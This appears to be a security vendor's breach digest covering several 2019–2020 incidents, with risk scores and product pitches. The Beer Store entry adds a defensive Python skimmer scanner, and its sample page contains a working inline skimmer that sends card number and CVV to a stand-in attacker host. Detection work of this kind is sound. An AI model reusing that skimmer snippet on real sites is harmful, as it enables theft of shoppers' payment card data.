Risk to Small Business: 2.117 = Severe Cybercriminals exfiltrated a company database containing personal information on thousands of internet influencers. Embarrassingly, the breach, which occurred in October 2019, was identified by TechCrunch reporters who were sent a copy of the stolen database. In a statement, the company said it had been unaware of the breach, raising serious questions about the efficacy of its cybersecurity strategy. This incident is likely to have significant blowback from well-connected influencers on social media and invite regulatory scrutiny on many fronts.

Individual Risk: 2.122 = Severe The stolen database contains account information for 217,000 users, including names, email addresses and hashed (scrambled) passwords. Those impacted by the breach should immediately update their login credentials for this website and for any other service where the same password was used, and closely monitor their accounts for unusual or suspicious activity.

Customers Impacted: 217,000

Effect On Customers: Hackers frequently target social media influencers because of their large public following. Therefore, companies catering to this clientele need to be prepared to protect their users’ valuable personal data. If they can’t, these influencers will almost certainly tell their followers all about it, a principle that applies to a growing number of consumers in every sector.

Risk Levels:

1 – 1.5 = Extreme Risk

1.51 – 2.49 = Severe Risk

2.5 – 3 = Moderate Risk

*The risk score is calculated using a formula that considers a wide range of factors related to the assessed breach.


Avantia Cyber Security & Huntsman Digital Auditor to the Rescue: Helping SMEs to understand the importance of security is no easy task. With an ‘Essential8’ Digital Security Audit we offer a remote-access, independent ‘real time’ audit of our clients’ critical operational infrastructure systems to determine where the gaps are, with recommendations for remediation.

It’s the first step to real cyber security. Call Avantia’s office on 07 30109711 or visit: https://www.avantiacybersecurity.com/cyber-security-audit

THREAT FOCUS: Ozark Orthopedics - UNITED STATES

https://ryortho.com/breaking/ozark-orthopaedics-data-breach-exposes-over-15000-patients/


Exploit: Phishing scam

Ozark Orthopedics: Orthopedic healthcare practice

Risk to Small Business: 2.113 = Severe Four employees fell for a phishing scam and gave hackers access to email accounts containing patient data. The scope of the data breach that occurred in late 2019 was just released by the healthcare provider, creating questions about the practice’s cybersecurity practices. As a result, patients were unable to quickly take steps to protect their identities and Ozark Orthopedics has opened itself up to regulatory scrutiny that could result in substantial financial penalties.

Individual Risk: 1.775 = Severe Patients’ personally identifiable information was exposed in the breach, including their names, treatment information, Medicare or Medicaid identification numbers, Social Security numbers, and financial account information. In the wrong hands, this information can be used in a litany of financial or identity-related crimes. Those impacted by the breach should immediately enroll in credit and identity monitoring services to secure their personal information.    

Customers Impacted: 15,240

Effect On Customers: More than a trillion phishing emails are sent each year, some of which will inevitably make their way into your employees’ inboxes. Training employees to spot these scams is especially important to protect your company from a devastating data breach.

Risk Levels:

1 – 1.5 = Extreme Risk

1.51 – 2.49 = Severe Risk

2.5 – 3 = Moderate Risk

*The risk score is calculated using a formula that considers a wide range of factors related to the assessed breach.


Avantia Cyber Security & ID Agent to the Rescue: BullPhish ID simulates phishing attacks and conducts security awareness training campaigns to educate your employees, making them the best defense against cybercrime. For more information call 07 30109711 (Office Hours) or Click the link to get started: https://www.avantiacybersecurity.com/overwatch


THREAT FOCUS: 10X Genomics Inc. - UNITED STATES

https://www.cyberscoop.com/covid-19-ransomware-10x-genomics-data-breach/


Exploit: Ransomware

10x Genomics Inc.: Biotechnology company

Risk to Small Business: 2.206 = Severe A ransomware attack disrupted operations at the biotechnology company, which is currently part of a consortium working to quickly develop a treatment for COVID-19. Before encrypting the company’s systems, the attackers exfiltrated company data. Although the company reports “no material day-to-day impact,” it is unclear what the implications are for the stolen data or how this could affect its COVID-19 treatment work.

Individual Risk: At this time, no personal information was compromised in the breach.  

Customers Impacted: Unknown

Effect On Customer: Companies in every sector have seen an uptick in cybersecurity threats as COVID-19 disrupts business-as-usual and puts many people on edge. This is especially true for the healthcare industry, which is experiencing a deluge of ransomware attacks, phishing scams, and other threats at a critical time.

Risk Levels:

1 – 1.5 = Extreme Risk

1.51 – 2.49 = Severe Risk

2.5 – 3 = Moderate Risk

*The risk score is calculated using a formula that considers a wide range of factors related to the assessed breach.


Avantia Cyber Security & ID Agent to the Rescue: BullPhish ID simulates phishing attacks and conducts security awareness training campaigns to educate your employees, making them the best defense against cybercrime. For more information call 07 30109711 (Office Hours) or Click the link to get started: https://www.avantiacybersecurity.com/overwatch


THREAT FOCUS: GoDaddy - UNITED STATES   

https://krebsonsecurity.com/2020/03/phish-of-godaddy-employee-jeopardized-escrow-com-among-others/?web_view=true


Exploit: Phishing scam  

GoDaddy: Internet domain registrar

Risk to Small Business: 2.313 = Severe A spear phishing attack tricked a customer service employee into providing information that ultimately allowed hackers to view and modify customer records. As a result, several GoDaddy clients, including Escrow.com, which provides escrow services for several prominent websites, were impacted. The breach will have costly implications for both GoDaddy and its customers, who will have to decide if they want to continue partnering with a company that puts their sensitive data at risk.  

Individual Risk: At this time, no personal information was compromised in the breach. 

Customers Impacted: Unknown

Effect On Customers: Today’s online ecosystem is vast and interconnected. This incident is a reminder that failures at other companies can have significant implications for your own, which increases the importance of securing accounts to buttress your IT infrastructure against potential failure at third-party contractors. With simple cybersecurity features, like two-factor authentication, company accounts remain secure even when credentials or login information is exposed.

Risk Levels:

1 – 1.5 = Extreme Risk

1.51 – 2.49 = Severe Risk

2.5 – 3 = Moderate Risk

*The risk score is calculated using a formula that considers a wide range of factors related to the assessed breach.


Avantia Cyber Security & ID Agent to the Rescue: With Passly, get the secure identity and access management solutions that you need to protect your systems and data in today’s remote work landscape at a price that you can afford, including multi-factor authentication, single sign-on, and secure password storage. Find out more by phoning Avantia on 07 30109711 or Click the link to get started: https://www.avantiacybersecurity.com/overwatch

THREAT FOCUS: The Beer Store - CANADA

https://www.itworldcanada.com/article/some-ontario-beer-chain-outlets-forced-to-use-cash-only-after-cyber-attack/429003


Exploit: Malware attack

The Beer Store: Retail store outlets

Risk to Small Business: 2.187 = Severe Cybercriminals infiltrated The Beer Store’s website and injected payment-skimming malware into its online store. The online store allowed customers to place orders for pickup or delivery, two critical features as social distancing measures keep shoppers at home. The breach removed The Beer Store’s ability to accept credit card payments online, which could significantly affect its bottom line during an already challenging time.

Individual Risk: 2.311 = Severe Although the company quickly detected the intrusion and closed its online store, anyone who made an online purchase before the threat was identified likely had their payment card details compromised – including any identification and financial information entered during the checkout process. Those impacted should notify their financial institutions of the breach while also taking steps to secure their accounts and personal details from misuse.

Customers Impacted: Unknown

Effect On Customers: Customers are increasingly unwilling to do business with companies that can’t protect their personal information. At the same time, privacy regulators are backing them up, collectively ensuring that companies have millions of reasons to execute on this mission critical priority.
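Payment skimmers of this kind work by adding JavaScript to the checkout page that copies card fields as they are typed or submitted and sends them to a server the attacker controls. As an added example (not code from The Beer Store or the article), the following Python script scans a saved copy of a checkout page for the three signs a practitioner would look for: scripts loaded from a host that is not on the expected list, third-party scripts served without a Subresource Integrity attribute, and inline scripts that both touch card fields and make a network call to an unexpected host. The first-party and allowed hosts, the sample page and the injected script are constructed for this example.

```python
"""Added example: scan a checkout page for signs of an injected payment skimmer."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Origins expected on the checkout page. Constructed for this example, not the retailer's real config.
FIRST_PARTY = "shop.example-retailer.test"
ALLOWED_SCRIPT_HOSTS = {FIRST_PARTY, "checkout.payments-provider.test"}

CARD_FIELDS = re.compile(r"card[-_ ]?number|cvv|cvc|expir", re.I)
NETWORK_CALL = re.compile(r"fetch\(|XMLHttpRequest|sendBeacon|new Image\(|\.src\s*=", re.I)
URL_IN_JS = re.compile(r"https?://([A-Za-z0-9.-]+)")


class ScriptCollector(HTMLParser):
    """Collects every <script> on the page: external ones by src, inline ones by body."""

    def __init__(self):
        super().__init__()
        self.external = []  # (src, has_integrity_attribute)
        self.inline = []    # script bodies
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.external.append((a["src"], "integrity" in a))
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def audit_checkout_page(html):
    """Return a list of findings; an empty list means nothing suspicious was seen."""
    p = ScriptCollector()
    p.feed(html)
    p.close()
    findings = []
    for src, has_sri in p.external:
        host = urlsplit(src).hostname or FIRST_PARTY  # relative src is served first-party
        if host not in ALLOWED_SCRIPT_HOSTS:
            findings.append(f"unexpected script host {host} ({src})")
        elif host != FIRST_PARTY and not has_sri:
            findings.append(f"third-party script without integrity attribute ({src})")
    for body in p.inline:
        foreign = {h for h in URL_IN_JS.findall(body) if h not in ALLOWED_SCRIPT_HOSTS}
        if CARD_FIELDS.search(body) and NETWORK_CALL.search(body) and foreign:
            findings.append("inline script reads card fields and sends to " + ", ".join(sorted(foreign)))
    return findings


# Constructed checkout page: a first-party script, a pinned payment-provider script,
# an injected library from an unknown CDN and an inline skimmer hooked on form submit.
CHECKOUT_HTML = """
<html><body>
<form id="pay" action="/checkout">
  <input name="card_number"><input name="cvv"><input name="expiry">
</form>
<script src="/static/app.js"></script>
<script src="https://checkout.payments-provider.test/v1/pay.js"
        integrity="sha384-AAAA" crossorigin="anonymous"></script>
<script src="https://cdn-stats.attacker.test/jquery.min.js"></script>
<script>
document.getElementById("pay").addEventListener("submit", function () {
  var d = {n: document.querySelector("[name=card_number]").value,
           c: document.querySelector("[name=cvv]").value};
  new Image().src = "https://cdn-stats.attacker.test/c.gif?d=" + btoa(JSON.stringify(d));
});
</script>
</body></html>
"""

if __name__ == "__main__":
    for finding in audit_checkout_page(CHECKOUT_HTML):
        print(finding)
```

Run it against pages fetched on a schedule and diff the findings, since skimmers are often served only on the checkout path or only to real browsers. Note what the check cannot do: Subresource Integrity protects only the third-party files you load, not script injected into your own server's HTML, which is the case this article describes; for that, a Content Security Policy that restricts connect-src and img-src to known hosts, plus file-integrity monitoring on the web server, is the matching control.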

Risk Levels:

1 – 1.5 = Extreme Risk

1.51 – 2.49 = Severe Risk

2.5 – 3 = Moderate Risk

*The risk score is calculated using a formula that considers a wide range of factors related to the assessed breach.


Avantia Cyber Security & Huntsman Digital Auditor to the Rescue: Helping SMEs to understand the importance of security is no easy task. With an ‘Essential8’ Digital Security Audit we offer a remote-access, independent ‘real time’ audit of our clients’ critical operational infrastructure systems to determine where the gaps are, with recommendations for remediation.

It’s the first step to real cyber security. Call Avantia’s office on 07 30109711 or visit: https://www.avantiacybersecurity.com/cyber-security-audit

THREAT FOCUS: SOS Online Backup - UNITED KINGDOM

https://www.securitymagazine.com/articles/92042-data-breach-report-cloud-backup-provider-exposes-more-than-135-million-customer-records